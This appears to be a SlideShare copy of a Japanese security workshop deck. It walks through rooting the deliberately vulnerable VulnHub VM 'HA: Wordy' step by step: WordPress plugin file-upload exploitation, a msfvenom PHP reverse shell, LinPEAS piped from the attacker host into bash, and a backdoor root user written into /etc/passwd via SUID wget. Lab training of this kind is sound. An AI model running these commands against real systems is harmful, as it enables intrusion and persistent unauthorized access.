SlideShare a Scribd company logo

イエラエセキュリティMeet up 20210820

GMOサイバーセキュリティ byイエラエ株式会社
GMOサイバーセキュリティ byイエラエ株式会社

イエラエセキュリティ ハンズオン勉強会資料

Business
1 of 106
Download to read offline
© 2021 Ierae Security Inc. All Rights Reserved. 0 © 2021 Ierae Security Inc. All Rights Reserved. ハンズオン勉強会 2021年8月20日
© 2021 Ierae Security Inc. All Rights Reserved. 1 • 講師の紹介 • OSINT PTとVulnHub • 攻撃者環境の構築 • 本日の攻撃対象 • Walkthrough: Wordy • チャレンジ問題 • チャレンジ問題 Writeup AGENDA
© 2021 Ierae Security Inc. All Rights Reserved. 2 講師の紹介 講師の紹介
© 2021 Ierae Security Inc. All Rights Reserved. 3 講師の紹介 Twitter: @kawakatz
© 2021 Ierae Security Inc. All Rights Reserved. 4 OSINT PTとVulnHub OSINT PTとVulnHub
© 2021 Ierae Security Inc. All Rights Reserved. 5 OSINT PTとVulnHub  管理アセット(ドメイン・ネットワーク)の調査  サブドメイン探索  利用SaaSの特定  ポートスキャン  各サービスへの調査  認証情報の探索  Google検索  etc...  Webアプリケーションへの攻撃  既知の脆弱性の悪用  認証試行  0dayの調査  etc...  権限昇格  横展開  etc...  エントリーポイント候補の洗い出し  エントリーポイントへの侵入に向けた情報収集  フィッシング
© 2021 Ierae Security Inc. All Rights Reserved. 6 OSINT PTとVulnHub  管理アセット(ドメイン・ネットワーク)の調査  サブドメイン探索  利用SaaSの特定  ポートスキャン  各サービスへの調査  認証情報の探索  Google検索  etc...  Webアプリケーションへの攻撃  既知の脆弱性の悪用  認証試行  0dayの調査  etc...  権限昇格  横展開  etc...  エントリーポイント候補の洗い出し  エントリーポイントへの侵入に向けた情報収集  フィッシング
© 2021 Ierae Security Inc. All Rights Reserved. 7 攻撃者環境の構築 攻撃者環境の構築
© 2021 Ierae Security Inc. All Rights Reserved. 8 攻撃者環境の構築(Kali Linux) sudo su passwd  rootユーザの有効化
© 2021 Ierae Security Inc. All Rights Reserved. 9 本日の攻撃対象 本日の攻撃対象
© 2021 Ierae Security Inc. All Rights Reserved. 10 本日の攻撃対象  HA: WORDY URL:https://www.vulnhub.com/entry/ha-wordy,363/ 目標:サーバのroot権限を奪取する
© 2021 Ierae Security Inc. All Rights Reserved. 11 本日の攻撃対象  関連サービス  Hack The Box (https://www.hackthebox.eu/) Boxと呼ばれるサーバを攻略しながら、PTの基礎的な攻撃手法を学ぶことができるサービス。 Boxは定期的に入れ替わるため、新しいBoxに挑戦し続けることができる。 Challengeと呼ばれるCTF系の問題も多数存在している。
© 2021 Ierae Security Inc. All Rights Reserved. 12 本日の攻撃対象  関連サービス  TryHackMe (https://tryhackme.com/) Hack The Boxと似ているが、テーマごとに分けて学習を進めることができる。
© 2021 Ierae Security Inc. All Rights Reserved. 13 本日の攻撃対象  関連サービス  OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1) Offensive Security社が提供する実践的なPTの資格。
© 2021 Ierae Security Inc. All Rights Reserved. 14 本日の攻撃対象  関連サービス  OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1) Offensive Security社が提供する実践的なPTの資格。
© 2021 Ierae Security Inc. All Rights Reserved. 15 本日の攻撃対象  HA: WORDY URL:https://www.vulnhub.com/entry/ha-wordy,363/ 学びたい事  Nmapを用いたポートスキャン  Burp Suiteを用いたHTTP通信の確認  Dirsearchを用いたディレクトリ探索  WPScanを用いたWordPressに対する調査  Exploit Codeの理解・悪用  LinPEASを用いた権限昇格フローの調査  脆弱性の悪用方法の理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 16 検証環境の設定 検証環境の設定
© 2021 Ierae Security Inc. All Rights Reserved. 17 検証環境の設定  前提条件 VirtualBoxにKali LinuxとWordyがインポートされていること  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 18 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 ここでは、VirtualBoxのNATネットワークを用いて、Kali LinuxとWordy間の通信を実現させます。 ファイル > 環境設定 > ネットワーク > +マーク  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 19 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 各仮想マシンのアダプタとして、先ほど作成したネットワークを用いてNATネットワークを指定します。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 20 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 2つの仮想マシンを起動します。 Kali Linux側でifconfigコマンドを実行すると、10.0.2.0/24内のIPアドレスが付与されていることが確認できます。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 21 検証環境の設定  ホストオンリーアダプタを用いた仮想マシン間通信の実現 netdiscoverコマンドを用いて、指定したIPレンジ内に存在するホストを列挙します。 netdiscover –r 10.0.2.0/24 ※ X.X.X.1のIPアドレスは基本的にホストOSとなります。その他、対象のIPアドレスが1つに絞れない場合、ポート スキャンの段階まで各IPアドレスに実施していただいて問題ありません。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 22 Walkthrough: Wordy Walkthrough: Wordy
© 2021 Ierae Security Inc. All Rights Reserved. 23 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IP Address> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IP Address> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
© 2021 Ierae Security Inc. All Rights Reserved. 24 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IP Address> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IP Address> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
© 2021 Ierae Security Inc. All Rights Reserved. 25 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IPアドレス> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IPアドレス> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
© 2021 Ierae Security Inc. All Rights Reserved. 26 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 Project options > Misc > Embedded Browser > Allow the embedded browser to run without a sandbox. Proxy > Intercept > Open Browser URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
© 2021 Ierae Security Inc. All Rights Reserved. 27 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
© 2021 Ierae Security Inc. All Rights Reserved. 28 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 Proxy > HTTP history URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
© 2021 Ierae Security Inc. All Rights Reserved. 29 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査  AQUATONE (https://github.com/michenriksen/aquatone)  EyeWitness (https://github.com/FortyNorthSecurity/EyeWitness) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
© 2021 Ierae Security Inc. All Rights Reserved. 30 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Google検索 site:<ドメイン名>  Wayback Machine (https://web.archive.org/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 31 Walkthrough: Wordy 目的:アクセス可能なURLの発見  waybackurls (https://github.com/tomnomnom/waybackurls) Twitter: @TomNomNom waybackurls <ドメイン名>  getallurls (https://github.com/lc/gau) gau <ドメイン名> URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 32 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearch (https://github.com/maurosoria/dirsearch) apt install dirsearch dirsearch –u <URL> (-w <Wordlist>) -w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 33 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearch (https://github.com/maurosoria/dirsearch) apt install dirsearch dirsearch –u <URL> (-w <Wordlist>) -w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 34 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 35 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 36 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Wappalyzer (https://www.wappalyzer.com/)  Dirsearchを用いたディレクトリ探索
© 2021 Ierae Security Inc. All Rights Reserved. 37 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) API Tokenがあるとなおよし URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 38 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) http://192.168.43.13/wordpress/?author=1 -> http://192.168.43.13/wordpress/index.php/author/admin/ URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 39 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) -eオプションについて URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 40 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://<IP Address>/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 41 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 42 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 43 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 44 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 45 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) searchsploit reflex gallery URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
© 2021 Ierae Security Inc. All Rights Reserved. 46 休憩(5分) 休憩(5分)
© 2021 Ierae Security Inc. All Rights Reserved. 47 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) searchsploit -m 36374 cat 36374.txt  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 48 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) vim exploit.html python3 –m http.server 80 echo "<?php phpinfo(); ?>" > phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 49 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 50 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 51 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 52 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) vim exploit.html URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 53 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 54 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 55 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 56 Walkthrough: Wordy 目的:脆弱性の悪用  Reverse Shell とは 攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること  Exploit Codeの理解・悪用 ① 脆弱性を悪用した攻撃 ② C2サーバへ接続 ③ C2サーバ越しに遠隔操作 C2サーバ 攻撃対象サーバ
© 2021 Ierae Security Inc. All Rights Reserved. 57 Walkthrough: Wordy 目的:脆弱性の悪用  Reverse Shell とは 攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること  Exploit Codeの理解・悪用 ① 脆弱性を悪用した攻撃 ② C2サーバへ接続 ③ C2サーバ越しに遠隔操作 C2サーバ 攻撃対象サーバ Kali Linux Wordy
© 2021 Ierae Security Inc. All Rights Reserved. 58 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msfvenom –l payload | grep php msfvenom -p php/reverse_php LHOST=<Kali's IP> LPORT=<Kali's Listen Port> -o shell.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 59 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msfconsole  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 60 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msf6 > use multi/handler msf6 > options  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 61 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msf6 exploit(multi/handler) > set payload php/reverse_php msf6 exploit(multi/handler) > set LHOST <Kali's IP> msf6 exploit(multi/handler) > set LPORT <Kali's Listen Port> msf6 exploit(multi/handler) > run  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 62 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) http://127.0.0.1/exploit.htmlからshell.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/shell.php  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 63 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 64 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809) msfconsole msf6 > search reflex gallery  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 65 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809) msf6 > use 0 msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > options msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOST <Wordy's IP> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST <Kali's IP> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT <Kali's Listen Port> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies http:127.0.0.1 msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > advanced msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set ReverseAllowProxy true msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 66 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 67 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用
© 2021 Ierae Security Inc. All Rights Reserved. 68 休憩(5分) 休憩(5分)
© 2021 Ierae Security Inc. All Rights Reserved. 69 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh python3 –m http.server 80  LinPEASを用いた権限昇格フローの調査
© 2021 Ierae Security Inc. All Rights Reserved. 70 Walkthrough: Wordy 目的:権限昇格フローの発見  PTY (pseudo terminal) 「擬似端末(ぎじたんまつ、英語: pseudo terminal)または疑似ターミナルとは、UNIXにおけるテキスト端末の擬似 デバイスのマスター・スレーブのペアである。仮想コンソール、端末装置、シリアルポートハードウェアなどを使用 しないテキスト端末のインターフェイスを提供する。これらのハードウェアの代わりに、擬似端末セッションの役割 をソフトウェア(プロセス)が代用する。例えば、SSHなどでログインするとこの端末に接続される。」 (引用元: https://ja.wikipedia.org/wiki/%E6%93%AC%E4%BC%BC%E7%AB%AF%E6%9C%AB) -> より扱いやすい + より見やすいTerminal meterpreter > shell python3 –c 'import pty; pty.spawn("/bin/bash")'  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 71 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) curl http://<Kali's IP>/linpeas.sh | bash wget http://<Kali's IP>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 72 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) curl http://<Kali's IP>/linpeas.sh | bash wget http://<Kali's IP>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 73 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) cat linpeas.sh | bash  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 74 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)  LinPEASを用いた権限昇格フローの調査
© 2021 Ierae Security Inc. All Rights Reserved. 75 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/)  LinPEASを用いた権限昇格フローの調査
© 2021 Ierae Security Inc. All Rights Reserved. 76 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/)  LinPEASを用いた権限昇格フローの調査
© 2021 Ierae Security Inc. All Rights Reserved. 77 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/) cp wget -> SUID root権限で書き込み可能  LinPEASを用いた権限昇格フローの調査
© 2021 Ierae Security Inc. All Rights Reserved. 78 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/) cp wget -> SUID root権限で書き込み可能  LinPEASを用いた権限昇格フローの調査 /etc/passwdを書き換えよう!
© 2021 Ierae Security Inc. All Rights Reserved. 79 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ここでは、backdoorとなる管理者ユーザを追加します。 まず、/etc/passwdからrootユーザの行をpasswdファイルの形式と照らし合わせながら見ていきます。 <UserName>:<Password Hash>:<User ID>:<Group ID>:<Comment>:<Home Directory>:<Login Shell> root:x:0:0:root:/root:/bin/bash ※ Password Hashに「x」と指定されている場合、ハッシュ値は/etc/shadowファイル内で定義されています。 rootユーザの行をベースにbackdoorとなるユーザの行を作成していきます。  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 80 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。 パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。 $id$salt$hash 1: MD5 5: SHA256 6: SHA512  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 81 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。 パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。 $id$salt$hash 1: MD5 5: SHA256 6: SHA512 こうしたパスワードハッシュはopensslコマンドのpasswdサブコマンドを用いて、以下のように生成することができ ます。 openssl passwd -<id> -salt <Salt> <Password>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 82 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え WordyサーバのpasswdをKaliにコピーし、末尾に1行追記します。 その後、Python製のWebサーバを起動し、改ざんしたpasswdファイルを配送する用意をします。 vim passwd echo 'ieraebackdoor:$1$ierae$1G/feXS0Di6qME/LP6Zg90:0:0:root:/root:/bin/bash' >> passwd python3 –m http.server 80  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 83 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え wgetのSUIDを悪用してWordyサーバの/etc/passwdを書き換えます。 wget http://<Kali's IP>/passwd –O /etc/passwd  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 84 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え /etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。 結果として、root権限を奪取することに成功しました。 su <Backdoor UserName>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 85 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え /etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。 結果として、root権限を奪取することに成功しました。 su <Backdoor UserName>  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 86 休憩(5分) 休憩(5分)
© 2021 Ierae Security Inc. All Rights Reserved. 87 チャレンジ問題 チャレンジ問題
© 2021 Ierae Security Inc. All Rights Reserved. 88 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution 